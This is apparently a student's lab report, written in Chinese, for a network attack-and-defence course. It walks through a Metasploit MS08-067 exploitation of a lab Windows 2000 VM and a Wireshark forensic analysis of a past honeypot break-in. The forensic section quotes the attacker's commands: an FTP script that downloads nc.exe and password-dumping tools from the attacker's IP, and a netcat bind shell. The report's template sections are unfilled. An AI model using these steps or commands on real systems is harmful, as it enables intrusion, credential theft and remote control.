20211903 2021-2022-2 《網路攻防實踐》實踐六報告
1.實踐內容
總結一下本週學習內容並介紹下實踐內容,不要複製貼上
2.實踐過程
(1)動手實踐Metasploit windows attacker
任務:使用metasploit軟體進行windows遠端滲透統計實驗
具體任務內容:使用windows Attacker/BT4攻擊機嘗試對windows Metasploitable靶機上的MS08-067漏洞進行遠端滲透攻擊,獲取目標主機的訪問權
| 虛擬機器 | IP地址 | MAC地址 |
|---|---|---|
| kali | 192.168.111.129 | 00:0c:29:13:9d:0f |
| MetaSploitable | 192.168.111.128 | 00:0c:29:fc:b2:c3 |
| seed_ubuntu | 192.168.111.130 | 00:0c:29:cf:17:b9 |
| WinXPattacker | 192.168.111.131 | 00:0c:29:92:da:b0 |
| Win2kServer | 192.168.111.133 | 00:0c:29:47:20:7b |
首先保證kali攻擊機可以ping通Win2k靶機可以ping通。
在kali攻擊機中開啟metasploit軟體,並完成msfconsole安裝。
輸入命令search ms08_067,查詢進行此漏洞攻擊的命令,找到為exploit/windows/smb/ms08_067_netapi。
使用命令use exploit/windows/smb/ms08_067_netapi,進出該漏洞的攻擊模組,並輸入命令show payloads,顯示所有可攻擊載荷。
通過命令set payload 3,來選擇攻擊載荷為tcp的反向連線。
通過命令show options來檢視設定及需要修改的各項引數。
通過set rhost 192.168.200.133和set lhost 192.168.111.129指令來設定靶機和攻擊機的IP地址,並重新檢視是否修改成功。
輸入exploit命令,執行攻擊。
一段時間等待後,顯示C:\WINNT\system32>可輸入指令,輸入 ipconfig顯示已進入192.168.111.133,即為運用MS08-067漏洞進行遠端滲透攻擊成功。
(2)取證分析實踐:解碼一次成功的NT系統破解攻擊。
來自212.116.251.162的攻擊者成功攻陷了一臺由rfp部署的蜜罐主機172.16.1.106,(主機名為lab.wiretrip.net),要求提取並分析攻擊的全部過程。
攻擊者使用了什麼破解工具進行攻擊
攻擊者如何使用這個破解工具進入並控制了系統
攻擊者獲得系統訪問許可權後做了什麼
開啟雲班課中上傳的log檔案,並用wireshark開啟。
通過篩選條件ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106來對記錄進行篩選,找到117條,可發現攻擊者進行了Http訪問,主機系統為Win NT5.0。
如下圖第117條記錄中資訊可以說知道攻擊機在首先http://lab.wiretrip.net/guest/default.asp進行了Unicode編碼攻擊並打開了NT系統啟動檔案 boot.ini。
接下來如下圖可知,第130,140,149條記錄都有msadc,追蹤149條記錄,有select語句可以發現攻擊者在進入SQL注入攻擊,通過查詢特徵碼ADM!ROX!YOUR!WORLD可以知道攻擊是由msadc(2).pl滲透攻擊程式碼發起的。
將篩選條件改為ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && http.request.method == "POST"後,依次追蹤TCP流,可觀察到一些cmd指令,首先觀察到cmd /c echo user johna2k > ftpcom,可知攻擊者建立了一個ftpcom指令碼。
追蹤第299條記錄發現攻擊者曾試圖攻擊但登陸失敗。
在第1106號記錄處,FTP連線成功,在FTP連線成功前的指令有如下指令等:
c echo open 213.116.251.162 >ftpcom
c echo johna2k >>ftpcom
c echo haxedj00 >>ftpcom
c echo get nc.exe >>ftpcom
c echo get pdump.exe >>ftpcom
c echo get samdump.dll >>ftpcom
c echo quit >>ftpcom
可知道攻擊者應該是想下載samdump.dll、pdump.exe和nc.exe這三個檔案。
在第1224條記錄中,可以看到攻擊者執行了cmd1.exe /c nc -l -p 6969 -e cmd1.exe這條指令,可以顯示攻擊者已經連線上了6969這個埠,並已經可以訪問。
我們如何防止這樣的攻擊
如果我們想預防這樣攻擊,我們應該儘量的去及時的更新作業系統的各種補丁,並儘量採用穩定版系統,降低新功能所造成的不安全風險。
你覺得攻擊者是否警覺了他的目標是一臺蜜罐主機?如果是,為什麼?
攻擊者一經發現這這臺目標主機為蜜罐主機,因為在追蹤第4351條記錄的TCP流時可以看到如下圖所示的攻擊者留下的語句。
(3)團隊對抗實踐:windows系統遠端滲透攻擊和分析。
攻方使用metasploit選擇漏洞進行攻擊,獲得控制權。(要求寫出攻擊方的同學資訊、使用漏洞、相關IP地址等)
防守方使用wireshark監聽獲得的網路資料包,分析攻擊過程,獲取相關資訊。
3.學習中遇到的問題及解決
- 問題1:XXXXXX
- 問題1解決方案:XXXXXX
- 問題2:XXXXXX
- 問題2解決方案:XXXXXX - ...
4.實踐總結
xxx xxx